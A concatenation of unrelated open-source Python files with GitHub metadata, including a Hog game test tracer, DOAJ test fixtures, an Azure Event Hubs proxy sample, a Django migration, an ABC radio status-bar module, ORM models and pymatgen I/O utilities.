def __repr__(self):
return str((self.score0, self.score1, self.score0_final,
self.score1_final, self.who, self.num_rolls, self.dice_sides))
def make_traced(s0, s1, six_sided, rerolled, four_sided, rerolled_four):
"""Given the strategy functions of player 0 and player 1, and six-sided and
rerolled dice, returns traced versions of the function to be used for the
game, as well as a function to retrieve the trace. """
trace = [] # List of GameTurns
def make_traced_strategy(strat, player):
def traced_strategy(score, opponent_score):
num_rolls = strat(score, opponent_score)
state = GameTurn(score, opponent_score, player, num_rolls)
if not trace:
trace.append(state)
elif trace[-1].is_successor(state):
trace[-1].set_successor(state)
trace.append(state)
return num_rolls
return traced_strategy
def make_traced_dice(dice, dice_sides, rerolled=False):
def traced_dice():
roll = dice()
if rerolled and roll % 2 == 1:
roll = dice()
if trace:
trace[-1].dice_sides = dice_sides
trace[-1].rerolled = rerolled
trace[-1].rolls.append(roll)
return roll
return traced_dice
def get_trace(score0, score1):
"""Given the final score outcome of the game, returns the trace of the
game."""
trace[-1].score0_final = score0
trace[-1].score1_final = score1
return trace
return make_traced_strategy(s0, 0), \
make_traced_strategy(s1, 1), \
make_traced_dice(six_sided, 6), \
make_traced_dice(rerolled, 6, True), \
make_traced_dice(four_sided, 4, False), \
make_traced_dice(rerolled_four, 4, True), \
get_trace
def play_traced(hog, strat0, strat1):
"""Returns the trace of a hog game, given the HOG module, as well as the
player 0 and 1 strategies for the game."""
reroll, six_sided, four_sided = hog.reroll, hog.six_sided, hog.four_sided
strat0, strat1, traced_six_sided, traced_rerolled, traced_four_sided, \
traced_rerolled_four, get_trace = \
make_traced(strat0, strat1, six_sided, reroll(six_sided), four_sided, reroll(four_sided))
hog.reroll = lambda dice: traced_rerolled if dice == traced_six_sided else traced_four_sided
hog.six_sided = traced_six_sided
hog.four_sided = traced_four_sided
score0, score1 = hog.play(strat0, strat1)
trace = get_trace(score0, score1)
hog.reroll = reroll
hog.six_sided = six_sided
hog.four_sided = four_sided
return trace
def check_play_function(hog):
"""Checks the `play` function of a student's HOG module by running multiple
seeded games, and comparing the results."""
random.seed(TEST_SEED)
sol_traces = load_traces_from_file(TRACE_SOL)
for i in range(NUM_TESTS):
strat0, strat1 = make_random_strat(), make_random_strat()
trace = play_traced(hog, strat0, strat1)
incorrect = compare_trace(trace, sol_traces[i])
if incorrect != -1:
print('Incorrect result after playing {0} game(s):'.format(i + 1))
print_trace(trace, incorrect)
print('Incorrect implementation of game at turn {0}.'.format(incorrect))
print('Please read over the trace to find your error.')
print("\nIf you're having trouble, try looking up the error ID on Piazza,")
print('or making a post with this full trace output.')
print('(error_id: {0})'.format(
hash((trace[incorrect], incorrect, i))))
break
def make_solution_traces(hog):
"""Given a reference HOG solution module, returns the hashed solution
trace."""
random.seed(TEST_SEED)
sol_traces = []
for i in range(NUM_TESTS):
strat0, strat1 = make_random_strat(), make_random_strat()
trace = play_traced(hog, strat0, strat1)
sol_traces.append([hash(state) for state in trace])
return sol_traces
def compare_trace(trace, sol):
"""Compares TRACE with the SOLUTION trace, and returns the turn number
where the two traces differ, or -1 if the traces are the same.
"""
i = 0
while i < min(len(trace), len(sol)):
state, sol_state = trace[i], sol[i]
if not state.is_correct(sol_state):
return i
i += 1
if len(trace) != len(sol):
return len(trace)
return -1
def print_trace(trace, incorrect=None):
"""Prints out the student trace."""
print('-'*64)
print('{0:>10}{1:>8}{2:>8} {3}'.format(
'',
'score0',
'score1',
'Turn Summary'))
print('-'*64)
for i, turn in enumerate(trace):
if incorrect is not None and i != incorrect:
continue
s0_change = turn.score0_final - turn.score0
s1_change = turn.score1_final - turn.score1
print('{0:<10}{1:8}{2:8} {3}'.format(
'Turn {0}:'.format(i),
turn.score0,
turn.score1,
turn.turn_summary))
print('{0:<10}{1:>8}{2:>8} {3}'.format(
'',
'' if s0_change == 0 else '{0:+}'.format(s0_change),
'' if s1_change == 0 else '{0:+}'.format(s1_change),
turn.turn_rolls))
print('{0:<10}{1:8}{2:8} {3}'.format(
'',
turn.score0_final,
turn.score1_final,
turn.dice_summary))
print('-'*64)
print('{0:<15}{1:3}{2:8}'.format(
'Final Score:',
turn.score0_final,
turn.score1_final))
print('-'*64)
def load_traces_from_file(path):
"""Given a file specified by a PATH, returns a trace."""
with open(path) as f:
return eval(f.read())
def write_traces_to_file(path, traces):
"""Given a target file specified by a PATH, and a solution trace, writes
the trace to the file."""
with open(path, 'w') as f:
f.write(str(traces))
|
{
"content_hash": "0c7d01aba7756f60222300a66b5f106d",
"timestamp": "",
"source": "github",
"line_count": 271,
"max_line_length": 97,
"avg_line_length": 36.28044280442804,
"alnum_prop": 0.5814686737184703,
"repo_name": "alienbrittani/cs61a",
"id": "a980d3df1b5ffec10aa26546a6d1ea0979120e57",
"size": "9832",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "projects/proj01_hog/tests/play_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "89354"
}
],
"symlink_target": ""
}
|
from copy import deepcopy
from werkzeug.datastructures import ImmutableMultiDict
class ArticleMetadataFactory(object):
def __init__(self, article_source):
self.article = article_source
def update_article_no_change_to_url_and_doi(self):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
form["doi"] = list(filter(lambda identifier: identifier['type'] == 'doi', self.article["bibjson"]["identifier"]))[0]["id"]
form["fulltext"] = list(filter(lambda link: link['type'] == 'fulltext', self.article["bibjson"]["link"]))[0]["url"]
form["pissn"] = list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
return ImmutableMultiDict(form)
def update_article_fulltext(self, valid):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
form["doi"] = list(filter(lambda identifier: identifier['type'] == 'doi', self.article["bibjson"]["identifier"]))[0]["id"]
if valid:
form["fulltext"] = 'https://www.newarticleurl.co.uk/fulltext'
else:
form["fulltext"] = 'https://www.urltorepeat.com'
form["pissn"] = \
list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = \
list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
return ImmutableMultiDict(form)
def update_article_doi(self, valid):
form = deepcopy(ARTICLE_METADATA_VALID_FORM)
if valid:
form["doi"] = '10.1111/article-0'
else:
form["doi"] = '10.1234/article'
form["doi"] = '10.1234/article'
form['pissn'] = list(filter(lambda identifier: identifier['type'] == 'pissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["eissn"] = list(filter(lambda identifier: identifier['type'] == 'eissn', self.article["bibjson"]["identifier"]))[0]["id"]
form["fulltext"] = list(filter(lambda link: link['type'] == 'fulltext', self.article["bibjson"]["link"]))[0][
"url"]
return ImmutableMultiDict(form)
ARTICLE_METADATA_VALID_FORM = {
'title': 'New title',
'authors-0-name': 'Agnieszka',
'authors-0-affiliation': 'Cottage Labs',
'authors-1-name': 'John Smith',
'authors-1-affiliation': 'DOAJ',
'abstract': 'This abstract has been edited',
'keywords': 'edited-1,edited-2, edited-3',
'publication_month': '10',
'publication_year': '1987',
#'pissn': '1234-5678',
#'eissn': '9876-5432',
'volume': '1',
'number': '1',
'start': '1',
'end': '1'
}
|
{
"content_hash": "1b24e14405e9bbe83ab9f715e1347c88",
"timestamp": "",
"source": "github",
"line_count": 64,
"max_line_length": 134,
"avg_line_length": 43.921875,
"alnum_prop": 0.607612949128424,
"repo_name": "DOAJ/doaj",
"id": "ade28efc837323b0c65e1a24fdf113a53ece9cd1",
"size": "2811",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "doajtest/unit/resources/articles_metadata_form.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "2399"
},
{
"name": "Dockerfile",
"bytes": "59"
},
{
"name": "HTML",
"bytes": "483733"
},
{
"name": "JavaScript",
"bytes": "952971"
},
{
"name": "Jinja",
"bytes": "15292"
},
{
"name": "Python",
"bytes": "3195030"
},
{
"name": "SCSS",
"bytes": "75276"
},
{
"name": "Shell",
"bytes": "28415"
}
],
"symlink_target": ""
}
|
"""Integration tests configuration file."""
import os
from mine.tests.conftest import ( # pylint: disable=unused-import
pytest_configure,
pytest_runtest_setup,
)
ROOT = os.path.dirname(__file__)
FILES = os.path.join(ROOT, "files")
|
{
"content_hash": "19604c6e6505730ea1091d68c3fe1922",
"timestamp": "",
"source": "github",
"line_count": 12,
"max_line_length": 66,
"avg_line_length": 20.333333333333332,
"alnum_prop": 0.7008196721311475,
"repo_name": "jacebrowning/mine",
"id": "102ee236c3e2283c2fb27731bdac3a26f9ff1a50",
"size": "244",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "tests/conftest.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "5744"
},
{
"name": "Python",
"bytes": "110990"
}
],
"symlink_target": ""
}
|
"""
An example to show sending and receiving events behind a proxy.
"""
import os
from azure.eventhub import EventData, EventHubConsumerClient, EventHubProducerClient
CONNECTION_STR = os.environ["EVENT_HUB_CONN_STR"]
EVENTHUB_NAME = os.environ['EVENT_HUB_NAME']
HTTP_PROXY = {
'proxy_hostname': '127.0.0.1', # proxy hostname.
'proxy_port': 3128, # proxy port.
'username': 'admin', # username used for proxy authentication if needed.
'password': '123456' # password used for proxy authentication if needed.
}
def on_event(partition_context, event):
# Put your code here.
print("received event from partition: {}.".format(partition_context.partition_id))
print(event)
consumer_client = EventHubConsumerClient.from_connection_string(
conn_str=CONNECTION_STR, consumer_group='$Default', eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)
producer_client = EventHubProducerClient.from_connection_string(
conn_str=CONNECTION_STR, eventhub_name=EVENTHUB_NAME, http_proxy=HTTP_PROXY)
with producer_client:
event_data_batch = producer_client.create_batch(max_size_in_bytes=10000)
while True:
try:
event_data_batch.add(EventData('Message inside EventBatchData'))
except ValueError:
# EventDataBatch object reaches max_size.
# New EventDataBatch object can be created here to send more data.
break
producer_client.send_batch(event_data_batch)
print('Finished sending.')
with consumer_client:
consumer_client.receive(on_event=on_event)
print('Finished receiving.')
|
{
"content_hash": "e8031b88849b1bbfe66e4009eb245e52",
"timestamp": "",
"source": "github",
"line_count": 44,
"max_line_length": 107,
"avg_line_length": 36.15909090909091,
"alnum_prop": 0.7146448774355751,
"repo_name": "Azure/azure-sdk-for-python",
"id": "f2f1eecc35825f0b3eebbb080219f913e1e267af",
"size": "1960",
"binary": false,
"copies": "1",
"ref": "refs/heads/main",
"path": "sdk/eventhub/azure-eventhub/samples/sync_samples/proxy.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Batchfile",
"bytes": "1224"
},
{
"name": "Bicep",
"bytes": "24196"
},
{
"name": "CSS",
"bytes": "6089"
},
{
"name": "Dockerfile",
"bytes": "4892"
},
{
"name": "HTML",
"bytes": "12058"
},
{
"name": "JavaScript",
"bytes": "8137"
},
{
"name": "Jinja",
"bytes": "10377"
},
{
"name": "Jupyter Notebook",
"bytes": "272022"
},
{
"name": "PowerShell",
"bytes": "518535"
},
{
"name": "Python",
"bytes": "715484989"
},
{
"name": "Shell",
"bytes": "3631"
}
],
"symlink_target": ""
}
|
from __future__ import unicode_literals
import json
from django.db import models, migrations
def show_facility_code_field(apps, schema_editor):
"""Create a facility code Field for each active org."""
Org = apps.get_model('orgs', 'Org')
DataField = apps.get_model('contacts', 'DataField')
for org in Org.objects.filter(is_active=True):
# Must manually load config; get_config is not available.
config = json.loads(org.config) if org.config else {}
DataField.objects.create(
org=org,
key=config.pop("facility_code_field", "facility_code"),
value_type="T", # Text
show_on_tracpro=True,
)
# Save the config without `facility_code_field`, which is no longer
# in use.
org.config = json.dumps(config) if config else None
org.save()
class Migration(migrations.Migration):
dependencies = [
('contacts', '0008_add_contactfield_model'),
]
operations = [
migrations.RunPython(
show_facility_code_field, migrations.RunPython.noop),
migrations.RemoveField(
model_name='contact',
name='facility_code',
),
]
|
{
"content_hash": "f42effe51170732c363c712f39db0c07",
"timestamp": "",
"source": "github",
"line_count": 42,
"max_line_length": 75,
"avg_line_length": 28.952380952380953,
"alnum_prop": 0.6101973684210527,
"repo_name": "xkmato/tracpro",
"id": "b8b7af4644737badc1235e9fc3dc412893fd54a7",
"size": "1240",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "tracpro/contacts/migrations/0009_show_facility_code_field.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "27726"
},
{
"name": "CoffeeScript",
"bytes": "10296"
},
{
"name": "HTML",
"bytes": "107840"
},
{
"name": "JavaScript",
"bytes": "25237"
},
{
"name": "Makefile",
"bytes": "1962"
},
{
"name": "Python",
"bytes": "406848"
},
{
"name": "SaltStack",
"bytes": "19566"
},
{
"name": "Scheme",
"bytes": "29815"
},
{
"name": "Shell",
"bytes": "205447"
}
],
"symlink_target": ""
}
|
import logging
import shutil
import threading
import os
import xml.etree.ElementTree as etree
from datetime import datetime
import requests
import vlc
from dateutil import parser
from dateutil.tz import tzutc
from i3pystatus import IntervalModule
from i3pystatus.core.desktop import DesktopNotification
from i3pystatus.core.util import internet, require
class State:
PLAYING = 1
PAUSED = 2
STOPPED = 3
class ABCRadio(IntervalModule):
"""
Streams ABC Australia radio - https://radio.abc.net.au/. Currently uses VLC to do the
actual streaming.
Requires the PyPI packages `python-vlc`, `python-dateutil` and `requests`. Also requires VLC
- https://www.videolan.org/vlc/index.html
.. rubric:: Available formatters
* `{station}` — Current station
* `{title}` — Title of current show
* `{url}` — Show's URL
* `{remaining}` — Time left for current show
* `{player_state}` — Unicode icons representing play, pause and stop
"""
settings = (
("format", "format string for when the player is inactive"),
("format_playing", "format string for when the player is playing"),
("target_stations", "list of station ids to select from. Station ids can be obtained "
"from the following XML - http://www.abc.net.au/radio/data/stations_apps_v3.xml. "
"If the list is empty, all stations will be accessible."),
)
format = "{station} {title} {player_state}"
format_playing = "{station} {title} {remaining} {player_state}"
on_leftclick = 'toggle_play'
on_upscroll = ['cycle_stations', 1]
on_downscroll = ['cycle_stations', -1]
on_doubleleftclick = 'display_notification'
interval = 1
# Destroy the player after this many seconds of inactivity
PLAYER_LIFETIME = 5
show_info = {}
player = None
station_info = None
station_id = None
stations = None
prev_title = None
prev_station = None
target_stations = []
end = None
start = None
destroy_timer = None
cycle_lock = threading.Lock()
player_icons = {
State.PAUSED: "▷",
State.PLAYING: "▶",
State.STOPPED: "◾",
}
def init(self):
self.station_info = ABCStationInfo()
@require(internet)
def run(self):
if self.station_id is None:
self.stations = self.station_info.get_stations()
# Select the first station in the list
self.cycle_stations(1)
if self.end and self.end <= datetime.now(tz=tzutc()):
self.update_show_info()
format_dict = self.show_info.copy()
format_dict['player_state'] = self.get_player_state()
format_dict['remaining'] = self.get_remaining()
format_template = self.format_playing if self.player else self.format
self.output = {
"full_text": format_template.format(**format_dict)
}
def update_show_info(self):
log.debug("Updating: show_info - %s" % datetime.now())
self.show_info = dict.fromkeys(
('title', 'url', 'start', 'end', 'duration', 'stream', 'remaining', 'station', 'description', 'title',
'short_synopsis', 'url'), '')
self.show_info.update(self.stations[self.station_id])
self.show_info.update(self.station_info.currently_playing(self.station_id))
# Show a notification when the show changes if the user is actively listening.
should_show = self.prev_station == self.show_info['station'] and self.prev_title != self.show_info[
'title'] and self.player
if should_show:
self.display_notification()
self.prev_title = self.show_info['title']
self.prev_station = self.show_info['station']
self.end = self.show_info['end'] if self.show_info['end'] else None
self.start = self.show_info['start'] if self.show_info['start'] else None
def get_player_state(self):
if self.player:
return self.player_icons[self.player.player_state]
else:
return self.player_icons[State.STOPPED]
def get_remaining(self):
if self.end and self.end > datetime.now(tz=tzutc()):
return str(self.end - datetime.now(tz=tzutc())).split(".")[0]
return ''
def cycle_stations(self, increment=1):
with self.cycle_lock:
target_array = self.target_stations if len(self.target_stations) > 0 else list(self.stations.keys())
if self.station_id in target_array:
next_index = (target_array.index(self.station_id) + increment) % len(target_array)
self.station_id = target_array[next_index]
else:
self.station_id = target_array[0]
log.debug("Cycle to: {}".format(self.station_id))
if self.player:
current_state = self.player.player_state
self.player.stop()
else:
current_state = State.STOPPED
self.update_show_info()
if self.player:
self.player.load_stream(self.show_info['stream'])
self.player.set_state(current_state)
def display_notification(self):
if self.show_info:
station, title, synopsis = self.show_info['station'], self.show_info['title'], self.show_info[
'short_synopsis']
title = "{} - {}".format(station, title)
def get_image():
image_link = self.show_info.get('image_link', None)
if image_link:
try:
image_path = "/tmp/{}.icon".format(station)
if not os.path.isfile(image_path):
response = requests.get(image_link, stream=True)
with open(image_path, 'wb') as out_file:
shutil.copyfileobj(response.raw, out_file)
return image_path
except:
pass
DesktopNotification(title=title, body=synopsis, icon=get_image()).display()
log.info("Displayed notification")
def toggle_play(self):
if not self.player:
self.init_player()
if self.player.is_playing():
self.player.pause()
self.destroy_timer = threading.Timer(self.PLAYER_LIFETIME, self.destroy)
self.destroy_timer.start()
else:
if self.destroy_timer:
self.destroy_timer.cancel()
self.destroy_timer = None
self.player.play()
self.run()
def init_player(self):
if self.show_info:
self.player = VLCPlayer()
log.info("Created player: {}".format(id(self.player)))
if not self.player.stream_loaded():
log.info("Loading stream: {}".format(self.show_info['stream']))
self.player.load_stream(self.show_info['stream'])
if not self.player.is_alive():
self.player.start()
def destroy(self):
log.debug("Destroying player: {}".format(id(self.player)))
if self.player:
self.player.destroy()
self.player = None
class ABCStationInfo:
PLAYING_URL = "https://program.abcradio.net.au/api/v1/programitems/{}/live.json?include=now"
def currently_playing(self, station_id):
station_info = self._get(self.PLAYING_URL.format(station_id)).json()
try:
return dict(
title=station_info['now']['program']['title'],
url=station_info['now']['primary_webpage']['url'],
start=parser.parse(station_info['now']['live'][0]['start']),
end=parser.parse(station_info['now']['live'][0]['end']),
duration=station_info['now']['live'][0]['duration_seconds'],
short_synopsis=station_info['now']['short_synopsis'],
stream=sorted(station_info['now']['live'][0]['outlets'][0]['audio_streams'], key=lambda x: x['type'])[0]['url']
)
except (KeyError, IndexError):
return {}
def get_stations(self):
stations = dict()
station_xml = etree.fromstring(self._get('http://www.abc.net.au/radio/data/stations_apps_v3.xml').content)
for element in station_xml:
attrib = element.attrib
if attrib["showInAndroidApp"] == 'true':
stations[attrib['id']] = dict(
id=attrib['id'],
station=attrib['name'],
description=attrib.get('description', None),
link=attrib.get('linkUrl', None),
image_link=attrib.get('WEBimageUrl', None),
stream=attrib.get('hlsStreamUrl', None),
)
return stations
def _get(self, url):
result = requests.get(url=url)
if result.status_code not in range(200, 300):
result.raise_for_status()
return result
log = logging.getLogger(__name__)
class VLCPlayer(threading.Thread):
def __init__(self):
threading.Thread.__init__(self)
self.idle = threading.Event()
self.die = threading.Event()
self.instance = vlc.Instance()
self.player_state = State.STOPPED
self.player = self.instance.media_player_new()
def run(self):
states = {
State.STOPPED: self.player.stop,
State.PLAYING: self.player.play,
State.PAUSED: self.player.pause,
}
while not self.die.is_set():
self.idle.wait()
states[self.player_state]()
self.idle.clear()
def load_stream(self, url):
self.player.set_media(self.instance.media_new(url))
def stream_loaded(self):
return self.player.get_media() is not None
def play(self):
self.set_state(State.PLAYING)
def pause(self):
self.set_state(State.PAUSED)
def stop(self):
self.set_state(State.STOPPED)
def destroy(self):
self.die.set()
self.idle.set()
self.player.stop()
self.player.release()
def set_state(self, state):
log.info("{} -> {}".format(self.player_state, state))
self.player_state = state
self.idle.set()
def is_playing(self):
return self.player.is_playing()
|
{
"content_hash": "9735854389705d773dad3db3e968c064",
"timestamp": "",
"source": "github",
"line_count": 299,
"max_line_length": 127,
"avg_line_length": 34.92642140468227,
"alnum_prop": 0.5746433017332184,
"repo_name": "m45t3r/i3pystatus",
"id": "8ee558965198f749a6eafd1e21a8dc0145cf0058",
"size": "10459",
"binary": false,
"copies": "3",
"ref": "refs/heads/myfork",
"path": "i3pystatus/abc_radio.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "517451"
},
{
"name": "Shell",
"bytes": "825"
}
],
"symlink_target": ""
}
|
from datetime import datetime
from pony.orm.core import PrimaryKey, Required, Optional, Set, Discriminator, sql_debug
from grepopla.model.database import db
from grepopla.settings import PRODUCTION
class GameObject(db.Entity):
_table_ = "game_object"
game_object_type = Discriminator(str)
id = PrimaryKey(int, auto=True)
game = Required("Game")
player = Optional("Player")
action = Optional(unicode)
size = Required(int)
class Player(db.Entity):
id = PrimaryKey(int, auto=True)
nick = Required(unicode, lazy=False)
color = Required(unicode)
commands = Set("Command")
games = Set("Game")
game_objects = Set(GameObject)
ip_address = Required(unicode)
class Game(db.Entity):
id = PrimaryKey(int, auto=True)
commands = Set("Command")
players = Set(Player)
objects = Set(GameObject)
created_at = Optional(datetime)
launched_at = Optional(datetime)
closed_at = Optional(datetime)
class Ship(GameObject):
pass
class Planet(GameObject):
x = Required(int)
y = Required(int)
is_free = Optional(int)
class Command(db.Entity):
_table_ = "log"
id = PrimaryKey(int, auto=True)
received = Required(datetime)
game = Required(Game)
player = Optional(Player)
sql_debug(not PRODUCTION)
db.generate_mapping(create_tables=True, check_tables=True)
db.check_tables()
|
{
"content_hash": "088a848f74d8814b51385a609e20f174",
"timestamp": "",
"source": "github",
"line_count": 59,
"max_line_length": 87,
"avg_line_length": 23.372881355932204,
"alnum_prop": 0.6845540246555475,
"repo_name": "spseol/grepopla-server",
"id": "a2334ffa0277c5efac0bf026b123912e31d6651f",
"size": "1379",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "grepopla/model/entity.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19408"
}
],
"symlink_target": ""
}
|
"""
This module provides utility classes for io operations.
"""
import codecs
import errno
import os
import re
import tempfile
from monty.io import zopen
__author__ = "Shyue Ping Ong, Rickard Armiento, Anubhav Jain, G Matteo, Ioannis Petousis"
__copyright__ = "Copyright 2011, The Materials Project"
__version__ = "1.0"
__maintainer__ = "Shyue Ping Ong"
__email__ = "shyuep@gmail.com"
__status__ = "Production"
__date__ = "Sep 23, 2011"
def ask_yesno(question, default=True):
"""
Args:
question ():
default ():
Returns:
"""
try:
answer = input(question)
return answer.lower().strip() in ["y", "yes"]
except EOFError:
return default
def clean_lines(string_list, remove_empty_lines=True):
"""
Strips whitespace, carriage returns and empty lines from a list of strings.
Args:
string_list: List of strings
remove_empty_lines: Set to True to skip lines which are empty after
stripping.
Returns:
List of clean strings with no whitespaces.
"""
for s in string_list:
clean_s = s
if "#" in s:
ind = s.index("#")
clean_s = s[:ind]
clean_s = clean_s.strip()
if (not remove_empty_lines) or clean_s != "":
yield clean_s
def micro_pyawk(filename, search, results=None, debug=None, postdebug=None):
"""
Small awk-mimicking search routine.
'file' is file to search through.
'search' is the "search program", a list of lists/tuples with 3 elements;
i.e. [[regex,test,run],[regex,test,run],...]
'results' is a an object that your search program will have access to for
storing results.
Here regex is either as a Regex object, or a string that we compile into a
Regex. test and run are callable objects.
This function goes through each line in filename, and if regex matches that
line *and* test(results,line)==True (or test is None) we execute
run(results,match),where match is the match object from running
Regex.match.
The default results is an empty dictionary. Passing a results object let
you interact with it in run() and test(). Hence, in many occasions it is
thus clever to use results=self.
Author: Rickard Armiento, Ioannis Petousis
Returns:
results
"""
if results is None:
results = {}
# Compile strings into regexs
for entry in search:
entry[0] = re.compile(entry[0])
with zopen(filename, "rt") as f:
for line in f:
for entry in search:
match = re.search(entry[0], line)
if match and (entry[1] is None or entry[1](results, line)):
if debug is not None:
debug(results, match)
entry[2](results, match)
if postdebug is not None:
postdebug(results, match)
return results
umask = os.umask(0)
os.umask(umask)
def _maketemp(name, createmode=None):
"""
Create a temporary file with the filename similar the given ``name``.
The permission bits are copied from the original file or ``createmode``.
Returns: the name of the temporary file.
"""
d, fn = os.path.split(name)
fd, tempname = tempfile.mkstemp(prefix=f".{fn}-", dir=d)
os.close(fd)
# Temporary files are created with mode 0600, which is usually not
# what we want. If the original file already exists, just copy its mode.
# Otherwise, manually obey umask.
try:
st_mode = os.lstat(name).st_mode & 0o777
except OSError as err:
if err.errno != errno.ENOENT:
raise
st_mode = createmode
if st_mode is None:
st_mode = ~umask
st_mode &= 0o666
os.chmod(tempname, st_mode)
return tempname
class AtomicFile:
"""
This is a straight port of Alexander Saltanov's atomicfile package.
Writeable file object that atomically writes a file.
All writes will go to a temporary file.
Call ``close()`` when you are done writing, and AtomicFile will rename
the temporary copy to the original name, making the changes visible.
If the object is destroyed without being closed, all your writes are
discarded.
If an ``encoding`` argument is specified, codecs.open will be called to open
the file in the wanted encoding.
"""
def __init__(self, name, mode="w+b", createmode=None, encoding=None):
"""
Args:
name ():
mode ():
createmode ():
encoding ():
"""
self.__name = name # permanent name
self._tempname = _maketemp(name, createmode=createmode)
if encoding:
self._fp = codecs.open(self._tempname, mode, encoding) # pylint: disable=R1732
else:
self._fp = open(self._tempname, mode) # pylint: disable=R1732
# delegated methods
self.write = self._fp.write
self.fileno = self._fp.fileno
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
if exc_type:
return
self.close()
def close(self):
"""
Close the file.
"""
if not self._fp.closed:
self._fp.close()
# This to avoid:
# FileExistsError: [WinError 183] Cannot create a file when that file already exists:
# On Windows, if dst already exists, OSError will be raised even if it is a file;
# there may be no way to implement an atomic rename when dst names an existing file.
if os.name == "nt" and os.path.exists(self.__name):
os.remove(self.__name)
os.rename(self._tempname, self.__name)
def discard(self):
"""
Discard the file.
"""
if not self._fp.closed:
try:
os.unlink(self._tempname)
except OSError:
pass
self._fp.close()
def __del__(self):
if getattr(self, "_fp", None): # constructor actually did something
self.discard()
|
{
"content_hash": "0e7ffdb1107864b422fc8bef6a63e127",
"timestamp": "",
"source": "github",
"line_count": 209,
"max_line_length": 99,
"avg_line_length": 29.526315789473685,
"alnum_prop": 0.5935828877005348,
"repo_name": "fraricci/pymatgen",
"id": "681a90de149016a256442d9b0a02c2ae81a2b827",
"size": "6265",
"binary": false,
"copies": "4",
"ref": "refs/heads/master",
"path": "pymatgen/util/io_utils.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "87"
},
{
"name": "CSS",
"bytes": "7572"
},
{
"name": "Cython",
"bytes": "38793"
},
{
"name": "HTML",
"bytes": "12642493"
},
{
"name": "OpenEdge ABL",
"bytes": "312"
},
{
"name": "Python",
"bytes": "9195124"
},
{
"name": "Roff",
"bytes": "1407429"
},
{
"name": "Shell",
"bytes": "12027"
}
],
"symlink_target": ""
}
|
from fields.jsonf import JSONField, JSONCharField
|
{
"content_hash": "d0f304bfe5721e4b7d178320edcd4012",
"timestamp": "",
"source": "github",
"line_count": 1,
"max_line_length": 49,
"avg_line_length": 50,
"alnum_prop": 0.86,
"repo_name": "williamroot/opps",
"id": "75747f61b28644c62d460c08c58f7aac57658658",
"size": "96",
"binary": false,
"copies": "5",
"ref": "refs/heads/master",
"path": "opps/db/models/__init__.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "13004"
},
{
"name": "HTML",
"bytes": "56927"
},
{
"name": "JavaScript",
"bytes": "62514"
},
{
"name": "Makefile",
"bytes": "848"
},
{
"name": "Python",
"bytes": "1387220"
},
{
"name": "Shell",
"bytes": "661"
}
],
"symlink_target": ""
}
|
import os
from cpp_namespace_environment import CppNamespaceEnvironment
from model import Model, UnixName
from schema_loader import SchemaLoader
def _GenerateFilenames(full_namespace):
# Try to find the file defining the namespace. Eg. for
# nameSpace.sub_name_space.Type' the following heuristics looks for:
# 1. name_space_sub_name_space.json,
# 2. name_space_sub_name_space.idl,
# 3. sub_name_space.json,
# 4. sub_name_space.idl,
# 5. etc.
sub_namespaces = full_namespace.split('.')
filenames = [ ]
basename = None
for namespace in reversed(sub_namespaces):
if basename is not None:
basename = UnixName(namespace + '.' + basename)
else:
basename = UnixName(namespace)
for ext in ['json', 'idl']:
filenames.append('%s.%s' % (basename, ext))
return filenames
class NamespaceResolver(object):
'''Resolves a type name into the namespace the type belongs to.
- |root| path to the root directory.
- |path| path to the directory with the API header files, relative to the
root.
- |include_rules| List containing tuples with (path, cpp_namespace_pattern)
used when searching for types.
- |cpp_namespace_pattern| Default namespace pattern
'''
def __init__(self, root, path, include_rules, cpp_namespace_pattern):
self._root = root
self._include_rules = [(path, cpp_namespace_pattern)] + include_rules
def ResolveNamespace(self, full_namespace):
'''Returns the model.Namespace object associated with the |full_namespace|,
or None if one can't be found.
'''
filenames = _GenerateFilenames(full_namespace)
for path, cpp_namespace in self._include_rules:
cpp_namespace_environment = None
if cpp_namespace:
cpp_namespace_environment = CppNamespaceEnvironment(cpp_namespace)
for filename in reversed(filenames):
filepath = os.path.join(path, filename);
if os.path.exists(os.path.join(self._root, filepath)):
schema = SchemaLoader(self._root).LoadSchema(filepath)[0]
return Model().AddNamespace(
schema,
filepath,
environment=cpp_namespace_environment)
return None
def ResolveType(self, full_name, default_namespace):
'''Returns the model.Namespace object where the type with the given
|full_name| is defined, or None if one can't be found.
'''
name_parts = full_name.rsplit('.', 1)
if len(name_parts) == 1:
if full_name not in default_namespace.types:
return None
return default_namespace
full_namespace, type_name = full_name.rsplit('.', 1)
namespace = self.ResolveNamespace(full_namespace)
if namespace and type_name in namespace.types:
return namespace
return None
|
{
"content_hash": "da866b6e80a1bb39639adc5d793f5500",
"timestamp": "",
"source": "github",
"line_count": 74,
"max_line_length": 79,
"avg_line_length": 37.04054054054054,
"alnum_prop": 0.6833272528274352,
"repo_name": "endlessm/chromium-browser",
"id": "6387c807a0506877d4713238654561e63fa07a0c",
"size": "2904",
"binary": false,
"copies": "6",
"ref": "refs/heads/master",
